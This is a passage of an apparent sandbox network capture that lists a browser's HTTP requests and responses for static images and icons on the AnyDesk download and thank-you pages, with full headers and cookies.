x-amz-cf-id: 5n4vJh2E6wc8OA1-KoOd-8Qzy8UZB5knJ-AokRbU3zr8BjJ_OSFInA==
age: 60995
GET

https://anydesk.com/favicon.ico

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /favicon.ico HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64
cookie: __hssc=261462610.2.1728144483689

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:11:52 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: Yu-NDSZorTt-2fb5LhPox4nS2V7WJTLe2vrYKVdiel72xlob-wCG_Q==
age: 60995
GET

https://anydesk.com/_static/img/favicon/android-chrome-192x192.png

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/favicon/android-chrome-192x192.png HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64
cookie: __hssc=261462610.3.1728144483689

Response

HTTP/2.0 200

content-type: image/png;charset=UTF-8
content-length: 70210
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: Bksd-_A2UWuIiOKPn58nsUxeUJmyFabmCy_nhsRlzPlwu8B_iDbNcA==
age: 61666
GET

https://anydesk.com/_static/img/videos/anydesk-video-getting-started-with-anydesk-darkmode-c2ab30.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/videos/anydesk-video-getting-started-with-anydesk-darkmode-c2ab30.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64
cookie: __hssc=261462610.3.1728144483689

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:11:52 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: mrCOMfj9EXgcncrnYLkcjGrJP_fHwdqOnkEevwy_K9-bASoz1FGcxw==
age: 60995
GET

https://anydesk.com/_static/img/videos/address-book-anydesk-e52bd3.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/videos/address-book-anydesk-e52bd3.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64
cookie: __hssc=261462610.3.1728144483689

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:11:52 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: N9-jsuhbCfuNWrBA21zpXD2ZnU-T1FCnn18KW6hFOL4XpFONsTIz8g==
age: 60995
GET

https://anydesk.com/_static/img/videos/secure-usage-anydesk-7c9605.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/videos/secure-usage-anydesk-7c9605.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64
cookie: __hssc=261462610.3.1728144483689

Response

HTTP/2.0 200

content-type: image/png;charset=UTF-8
content-length: 54497
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: fiQi7SRldegxGqj0o4X2OJcz9T7jQ1Dqg0Bekjw13ffS5GiXGTLGCQ==
age: 61666
GET

https://anydesk.com/_static/img/videos/transfer-file-anydesk-2a0ba9.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/videos/transfer-file-anydesk-2a0ba9.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64
cookie: __hssc=261462610.3.1728144483689

Response

HTTP/2.0 200

content-type: image/png;charset=UTF-8
content-length: 55319
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: -ddhI6Cf_QS6KhN6uw4VLNhzzteiqqlY6Lx16LaCjJnbrFNklxA55Q==
age: 61666
GET

https://anydesk.com/_static/img/badges/industry-leader-cap-badge-ff7a28.png

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/badges/industry-leader-cap-badge-ff7a28.png HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64
cookie: __hssc=261462610.3.1728144483689

Response

HTTP/2.0 200

content-type: image/png;charset=UTF-8
content-length: 24038
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: Z0Lbx-m0BBljAMzbw0Tj_QsQNhNvIr-EQ5K0gDcvLoXUFzUNCON1UA==
age: 61666
GET

https://anydesk.com/_static/img/badges/frontend-runners-badge-ca1e63.png

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/badges/frontend-runners-badge-ca1e63.png HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64
cookie: __hssc=261462610.3.1728144483689

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: sO5LClHGx3hQpLyuhrF3qiKUvjBtjOicooVQLQkqCYGqrTW7U-Yozg==
age: 61667
GET

https://anydesk.com/_static/img/badges/industry-leader-ga-badge-a953a8.png

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/badges/industry-leader-ga-badge-a953a8.png HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64
cookie: __hssc=261462610.3.1728144483689

Response

HTTP/2.0 200

content-type: image/png;charset=UTF-8
content-length: 28073
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: ZJ8ux-P8haWPte2eT56XSweZBZgAtYfWDlF8N29DkL-iSVvdfNrr7g==
age: 61667
GET

https://anydesk.com/_static/img/badges/industry-leader-g2-badge-96f1be.png

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/badges/industry-leader-g2-badge-96f1be.png HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64
cookie: __hssc=261462610.3.1728144483689

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: NJXFyQ-oShCHVWF-kEDU2h1fpbiKTgI-ZxS-ttpTgc0wVnvytnatTg==
age: 61667
GET

https://anydesk.com/_static/img/badges/industry-leader-g2-fastest-implementation-badge-072879.png

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/badges/industry-leader-g2-fastest-implementation-badge-072879.png HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64
cookie: __hssc=261462610.3.1728144483689

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: iU9rxV0xT-pk2VKn3Jtm-7CdebiqMlW8ou2PLUjI9ivooLatYP97Fg==
age: 61667
GET

https://anydesk.com/_static/icons/red/bold/social-instagram-63cc5c.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/bold/social-instagram-63cc5c.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64
cookie: __hssc=261462610.3.1728144483689

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 9FyZGWNs1YwNRVLmLIJlDd6qhbj_X7X2DCDSzHRUBT4dj_nDa526IQ==
age: 61667
GET

https://anydesk.com/_static/icons/red/bold/social-media-facebook-338621.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/bold/social-media-facebook-338621.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64
cookie: __hssc=261462610.3.1728144483689

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: xxY3bU8wSA6Rk7HyPv0kxYPLKJlW-Yf3MahXkXPhx9xZzobF9_boFQ==
age: 61667
GET

https://anydesk.com/_static/icons/red/bold/professional-network-linkedin-5d10a1.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/bold/professional-network-linkedin-5d10a1.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64
cookie: __hssc=261462610.3.1728144483689

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: wv2vkR9C2snJEDufYMygfZCiTewZfsFm_A6pGhig2rkmb_elgSKhMA==
age: 61667
GET

https://anydesk.com/_static/icons/red/bold/social-video-youtube-clip-57b798.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/bold/social-video-youtube-clip-57b798.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64
cookie: __hssc=261462610.3.1728144483689

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: Tq_dVyKQ8nmXhcVKDZd-7p1JKVAw74fu_5lRGVo_wEnmaFS-e4D6uA==
age: 61667
GET

https://anydesk.com/_static/icons/red/bold/social-media-reddit-c78a92.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/bold/social-media-reddit-c78a92.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64
cookie: __hssc=261462610.3.1728144483689
GET

https://anydesk.com/_static/img/icons/twitter-logo-red-03eb4e.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/twitter-logo-red-03eb4e.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64
cookie: __hssc=261462610.3.1728144483689
GET

https://anydesk.com/_static/img/icons/tiktok-logo-red-06fc15.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/tiktok-logo-red-06fc15.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
